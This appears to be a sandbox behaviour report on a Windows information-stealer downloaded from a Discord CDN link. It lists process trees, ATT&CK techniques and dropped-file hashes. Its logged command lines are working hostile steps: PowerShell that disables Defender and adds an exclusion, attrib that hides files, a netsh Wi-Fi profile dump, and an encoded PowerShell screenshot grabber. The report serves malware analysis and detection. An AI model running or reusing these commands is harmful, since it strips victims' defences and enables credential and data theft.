Token: SeIncreaseQuotaPrivilege	2992	wmic.exe
Token: SeSecurityPrivilege	2992	wmic.exe
Token: SeTakeOwnershipPrivilege	2992	wmic.exe
Token: SeLoadDriverPrivilege	2992	wmic.exe
Token: SeSystemProfilePrivilege	2992	wmic.exe
Token: SeSystemtimePrivilege	2992	wmic.exe
Token: SeProfSingleProcessPrivilege	2992	wmic.exe
Token: SeIncBasePriorityPrivilege	2992	wmic.exe
Token: SeCreatePagefilePrivilege	2992	wmic.exe
Token: SeBackupPrivilege	2992	wmic.exe
Token: SeRestorePrivilege	2992	wmic.exe
Token: SeShutdownPrivilege	2992	wmic.exe
Token: SeDebugPrivilege	2992	wmic.exe
Token: SeSystemEnvironmentPrivilege	2992	wmic.exe
Token: SeRemoteShutdownPrivilege	2992	wmic.exe
Token: SeUndockPrivilege	2992	wmic.exe
Token: SeManageVolumePrivilege	2992	wmic.exe
Token: 33	2992	wmic.exe
Token: 34	2992	wmic.exe
Token: 35	2992	wmic.exe
Token: 36	2992	wmic.exe

Suspicious use of FindShellTrayWindow 41 IoCs

Processes:

msedge.exe

pid	process
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe
4896	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4896 wrote to memory of 3252	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 3252	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4980	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 1220	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 1220	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe
PID 4896 wrote to memory of 4192	4896	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

3920 attrib.exe
4876 attrib.exe
5544 attrib.exe
5564 attrib.exe

pid	process
3920	attrib.exe
4876	attrib.exe
5544	attrib.exe
5564	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1282151429091495947/1282496522574893074/rename_1.exe?ex=66df9176&is=66de3ff6&hm=7de87238a1c015a7964d0f67b15efc5d96416981adc21c9759323256cf3718a9&
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe661546f8,0x7ffe66154708,0x7ffe66154718
  2⤵
  PID:3252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
  2⤵
  PID:4980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
  2⤵
  PID:4192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:4036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:688
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8
  2⤵
  PID:2400
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:4040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:3120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
  2⤵
  PID:3336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
  2⤵
  PID:2364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5920 /prefetch:8
  2⤵
  PID:1964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
  2⤵
  PID:4892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6372 /prefetch:8
  2⤵
  PID:1968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5580 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:752
- C:\Users\Admin\Downloads\rename (1).exe
  "C:\Users\Admin\Downloads\rename (1).exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Adds Run key to start application
  - Maps connected drives based on registry
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:640
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\Downloads\rename (1).exe"
    3⤵
    - Views/modifies file attributes
    PID:3920
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
    3⤵
    - Views/modifies file attributes
    PID:4876
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4368
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    - Suspicious use of AdjustPrivilegeToken
    PID:2992
- - C:\Windows\System32\Wbem\wmic.exe
    wmic os get Caption
    3⤵
    PID:4368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\rename (1).exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5124
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:5268
- - C:\Windows\System32\Wbem\wmic.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5340
- - C:\Windows\System32\Wbem\wmic.exe
    wmic csproduct get UUID
    3⤵
    PID:5372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5412
- - C:\Windows\system32\attrib.exe
    attrib -r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:5544
- - C:\Windows\system32\attrib.exe
    attrib +r C:\Windows\System32\drivers\etc\hosts
    3⤵
    - Drops file in Drivers directory
    - Views/modifies file attributes
    PID:5564
- - C:\Windows\system32\netsh.exe
    netsh wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
    3⤵
    PID:5652
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pxgewsgz\pxgewsgz.cmdline"
      4⤵
      PID:5776
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEB3B.tmp" "c:\Users\Admin\AppData\Local\Temp\pxgewsgz\CSCE4F4550F7B2E4986B1CC2CB1269A76D.TMP"
        5⤵
        
        PID:5816
- C:\Users\Admin\Downloads\rename (1).exe
  "C:\Users\Admin\Downloads\rename (1).exe"
  2⤵
  - Executes dropped EXE
  PID:6100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11460430824069957105,3964208707041572129,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4700 /prefetch:2
  2⤵
  PID:5804

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4552

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
111c361619c017b5d09a13a56938bd54

SHA1
e02b363a8ceb95751623f25025a9299a2c931e07

SHA256
d7be4042a1e3511b0dbf0ab5c493245e4ac314440a4ae0732813db01a21ef8bc

SHA512
fc16a4ad0b56899b82d05114d7b0ca8ee610cdba6ff0b6a67dea44faf17b3105109335359b78c0a59c9011a13152744a7f5d4f6a5b66ea519df750ef03f622b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
983cbc1f706a155d63496ebc4d66515e

SHA1
223d0071718b80cad9239e58c5e8e64df6e2a2fe

SHA256
cc34b8f8e3f4bfe4c9a227d88f56ea2dd276ca3ac81df622ff5e9a8ec46b951c

SHA512
d9cf2ca46d9379902730c81e615a3eb694873ffd535c6bb3ded2dc97cdbbfb71051ab11a07754ed6f610f04285605b702b5a48a6cfda3ee3287230c41c9c45cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
3ddf6192fff0e0cd843843825a503956

SHA1
1bee4c2526a5589218bd0379b1a7ef5fd722de27

SHA256
